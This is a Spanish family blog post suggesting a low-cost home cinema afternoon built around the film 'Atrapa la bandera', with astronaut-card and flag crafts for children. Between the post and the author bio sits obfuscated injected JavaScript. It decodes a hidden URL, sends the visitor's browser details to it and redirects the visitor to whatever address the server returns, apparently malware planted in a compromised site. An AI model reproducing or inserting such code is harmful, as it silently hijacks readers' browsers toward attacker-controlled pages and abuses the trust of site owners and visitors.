Sesión de cine en casa y mucho más

Hace unos días acudimos a la presentación del dvd de Atrapa la bandera y cogimos ideas para hacer nuestra propia tarde de cine en casa. ¿Alguien se apunta?

Cuántas veces nos quejamos con nuestra pareja de lo caro que se ha puesto ir al cine con los niños o comentamos en la puerta del colegio de nuestros hijos con otras mamis que las entradas para ver una película ya casi se han convertido en un artículo de lujo. ¿Y por qué decimos eso? Está claro, y es una verdad que no se puede cambiar, que el hecho de ir al cine no es solo pagar los tickets, también son las palomitas, las bebidas, las gominolas… ¿cierto o no? Por eso, y sin querer quitar las ganas ni las intenciones de acudir a una sala a disfrutar en alta definición de un buen título, sentada en esas butacas en las que casi te dan ganas de echarte una siesta en algunos momentos, quería proponerte para las venideras tardes de domingo invernales que transformes tu salón en una sala de cine.

En casa nos hemos hecho con el dvd de Atrapa la bandera, una cinta que probablemente la mayoría vio este verano cuando se estrenó, pero por si hay algún despistad@ leyendo este post que no la ha saboreado aún, aquí dejo cinco razones por las que merece la pena verla una, dos y todas las veces que se quiera:

  1. Porque por primera vez una chica llega a la luna
  2. Porque abuelos y nietos trabajan juntos en un proyecto común. Lo nuevo y la experiencia unidos. ¡Lo más!
  3. Porque el más pillo no es el que gana
  4. Porque cuando no salen las cosas como uno quiere, la violencia no lleva a ningún sitio
  5. Y porque tampoco me creo que no haya vuelto nadie a la luna

IMG_2583

Y ahora vamos con lo prometido. Como la película va de un astronauta, ¿por qué no crear antes de la proyección de la misma un carnet de astronauta para los asistentes? Es muy sencillo: coge medio folio, deja un hueco para poner una foto del peque y luego que ponga el nombre, apellido y el apodo por el que le gustaría que se le conociera en el espacio. Esta manualidad la puedes hacer antes de la proyección y comentarle que es imprescindible tener uno para poder dar al play al dvd.

IMG_2585

Otra propuesta, que hace referencia al nombre de la cinta y que dejaría para después de haberla visto, es crear vuestra propia bandera. ¿Cómo? Hazte con un palo largo que haga de bastón (yo he utilizado una pajita,  pero otra buena opción es el palo para hacer brochetas de frutas en la cena/comida de Navidad) y luego, en un medio folio, que tu hijo dibuje algo que le haya llamado la atención del largometraje.

Espero que te haya gustado este plan casero y de bajo coste, porque nosotros nos lo pasamos muy bien haciéndolo.
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *